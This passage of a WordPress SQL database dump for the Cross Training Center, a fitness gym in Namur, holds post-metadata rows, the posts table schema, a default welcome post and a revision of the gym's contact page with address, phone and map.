(1454, 382, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383468836:1\";}\";'),
(1319, 356, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1320, 356, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1381355870:2\";}\";'),
(1321, 356, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1322, 356, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1323, 356, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1324, 356, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1451, 381, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1448, 381, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383468836:1\";}\";'),
(1449, 381, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1450, 381, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1447, 381, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1331, 358, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1332, 358, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383296223:1\";}\";'),
(1333, 358, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1334, 358, '_su_title', 's:59:\"a:1:{i:0;s:41:\"Cross Training Center - Le cross training\";}\";'),
(1335, 358, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Le cross training regroupe les disciplines : TRX Suspension Training, Kettlebell, ViPR, RIP Trainer.\";}\";'),
(1336, 358, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1337, 359, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1338, 359, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383296279:1\";}\";'),
(1339, 359, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1340, 359, '_su_title', 's:59:\"a:1:{i:0;s:41:\"Cross Training Center - Le cross training\";}\";'),
(1341, 359, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Le cross training regroupe les disciplines : TRX Suspension Training, Kettlebell, ViPR, RIP Trainer.\";}\";'),
(1342, 359, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1343, 360, '_edit_last', '1'),
(1344, 360, '_edit_lock', '1383585922:1'),
(1345, 360, '_wp_page_template', 'default'),
(1346, 361, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1347, 361, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383296982:1\";}\";'),
(1348, 361, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1349, 360, '_su_rich_snippet_type', 'none'),
(1350, 362, '_menu_item_type', 'post_type'),
(1351, 362, '_menu_item_menu_item_parent', '0'),
(1352, 362, '_menu_item_object_id', '360'),
(1353, 362, '_menu_item_object', 'page'),
(1354, 362, '_menu_item_target', ''),
(1355, 362, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(1356, 362, '_menu_item_xfn', ''),
(1357, 362, '_menu_item_url', ''),
(1359, 363, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1360, 363, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297074:1\";}\";'),
(1361, 363, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1362, 363, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1363, 364, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1364, 364, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297160:1\";}\";'),
(1365, 364, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1366, 364, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1367, 365, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1368, 365, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297221:1\";}\";'),
(1369, 365, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1370, 365, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1371, 365, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1372, 365, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297281:1\";}\";'),
(1373, 365, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1374, 365, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1375, 366, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1376, 366, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297311:1\";}\";'),
(1377, 366, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1378, 366, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1379, 365, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1380, 365, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297360:1\";}\";'),
(1381, 365, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1382, 365, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1383, 367, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1384, 367, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297406:1\";}\";'),
(1385, 367, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1386, 367, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1387, 368, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1388, 368, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297426:1\";}\";'),
(1389, 368, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1390, 368, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1391, 369, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1392, 369, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297445:1\";}\";'),
(1393, 369, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1394, 369, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1395, 365, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1396, 365, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297501:1\";}\";'),
(1397, 365, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1398, 365, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1399, 370, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1400, 370, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297562:1\";}\";');
INSERT INTO `www_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1401, 370, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1402, 370, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1403, 371, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1404, 371, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297683:1\";}\";'),
(1405, 371, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1406, 371, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1407, 372, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1408, 372, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297731:1\";}\";'),
(1409, 372, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1410, 372, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1411, 373, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1412, 373, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297767:1\";}\";'),
(1413, 373, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1414, 373, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1415, 374, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1416, 374, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297791:1\";}\";'),
(1417, 374, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1418, 374, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1419, 375, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1420, 375, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383297946:1\";}\";'),
(1421, 375, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1422, 375, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1423, 376, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1424, 376, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383298012:1\";}\";'),
(1425, 376, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1426, 376, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1427, 377, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1428, 377, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383298053:1\";}\";'),
(1429, 377, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1430, 377, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1431, 365, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1432, 365, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383298105:1\";}\";'),
(1433, 365, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1434, 365, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1435, 378, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1436, 378, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383298135:1\";}\";'),
(1437, 378, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1438, 378, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1439, 379, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1440, 379, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383298197:1\";}\";'),
(1441, 379, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1442, 379, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1443, 380, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1444, 380, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383298225:1\";}\";'),
(1445, 380, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1446, 380, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1827, 451, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383583770:1\";}\";'),
(1826, 451, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1825, 450, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1702, 430, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1703, 430, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383472811:1\";}\";'),
(1704, 430, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1705, 430, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1706, 431, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1707, 431, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383472918:1\";}\";'),
(1708, 431, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1709, 431, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1824, 450, '_su_description', 's:198:\"a:1:{i:0;s:179:\"Unique à Namur, une nouvelle façon de faire du fitness. Nous vous proposons une approche globale faisant intervenir l\'alimentation, l\'activité physique, et la gestion du stress\";}\";'),
(1714, 432, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1715, 432, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383473019:1\";}\";'),
(1716, 432, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1717, 432, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1823, 450, '_su_title', 's:59:\"a:1:{i:0;s:41:\"Cross Training Center - Notre philosophie\";}\";'),
(1822, 450, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1821, 450, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383583660:1\";}\";'),
(1722, 433, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1723, 433, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383473187:1\";}\";'),
(1724, 433, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1725, 433, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1820, 450, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1819, 449, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1818, 449, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1817, 449, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383475295:1\";}\";'),
(1730, 434, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1731, 434, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383473346:1\";}\";'),
(1732, 434, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1733, 434, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1816, 449, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1815, 447, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1814, 447, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1813, 447, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383475295:1\";}\";'),
(1812, 447, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1811, 448, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1810, 448, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1809, 448, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383475217:1\";}\";'),
(1742, 435, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1743, 435, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383473514:1\";}\";'),
(1744, 435, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1745, 435, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1746, 436, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1747, 436, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383473644:1\";}\";'),
(1748, 436, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1749, 436, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1808, 448, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1807, 447, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1806, 447, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1754, 437, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1755, 437, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383473719:1\";}\";'),
(1756, 437, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1757, 437, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1758, 438, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1759, 438, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383473759:1\";}\";'),
(1760, 438, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1761, 438, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1762, 439, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1763, 439, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383473791:1\";}\";'),
(1764, 439, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1765, 439, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1801, 445, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1800, 445, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1799, 445, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383474278:1\";}\";'),
(1798, 445, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1770, 440, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1771, 440, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383473915:1\";}\";'),
(1772, 440, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1773, 440, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1774, 419, '_wp_trash_meta_status', 'publish'),
(1775, 419, '_wp_trash_meta_time', '1383473951'),
(1776, 9, '_wp_trash_meta_status', 'publish'),
(1777, 9, '_wp_trash_meta_time', '1383473952'),
(1778, 441, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1779, 441, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383474002:1\";}\";'),
(1780, 441, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1781, 441, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1782, 442, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1783, 442, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383474041:1\";}\";'),
(1784, 442, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1785, 442, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1786, 442, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1787, 442, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1788, 443, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1789, 443, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383474096:1\";}\";'),
(1790, 443, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1791, 443, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1792, 443, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1793, 443, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1794, 444, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1795, 444, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383474169:1\";}\";'),
(1796, 444, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1797, 444, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1848, 452, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1849, 452, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584341:1\";}\";'),
(1850, 452, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1851, 452, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1852, 452, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1853, 452, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584500:1\";}\";'),
(1854, 452, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1855, 452, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1856, 452, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1857, 452, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584586:1\";}\";'),
(1858, 452, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1859, 452, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1860, 452, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1861, 452, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584646:1\";}\";'),
(1862, 452, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1863, 452, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1864, 452, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1865, 452, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584697:1\";}\";'),
(1866, 452, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1867, 452, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1868, 453, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1869, 453, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584742:1\";}\";'),
(1870, 453, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1871, 453, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1872, 452, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1873, 452, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584815:1\";}\";'),
(1874, 452, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1875, 452, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1876, 454, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1877, 454, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584830:1\";}\";'),
(1878, 454, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1879, 454, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1880, 455, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1881, 455, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584867:1\";}\";'),
(1882, 455, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1883, 455, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";');

-- --------------------------------------------------------

--
-- Structure de la table `www_posts`
--

CREATE TABLE `www_posts` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `post_author` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(20) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www_posts`
--

INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1, 1, '2013-05-23 18:04:49', '2013-05-23 18:04:49', 'Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!', 'Hello world!', '', 'publish', 'open', 'open', '', 'hello-world', '', '', '2013-05-23 18:04:49', '2013-05-23 18:04:49', '', 0, 'http://www.crosstrainingcenter.be/?p=1', 0, 'post', '', 0),
(328, 1, '2013-07-10 15:47:50', '2013-07-10 15:47:50', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-10 15:47:50', '2013-07-10 15:47:50', '', 9, 'http://www.crosstrainingcenter.be/9-revision-19/', 0, 'revision', '', 0),
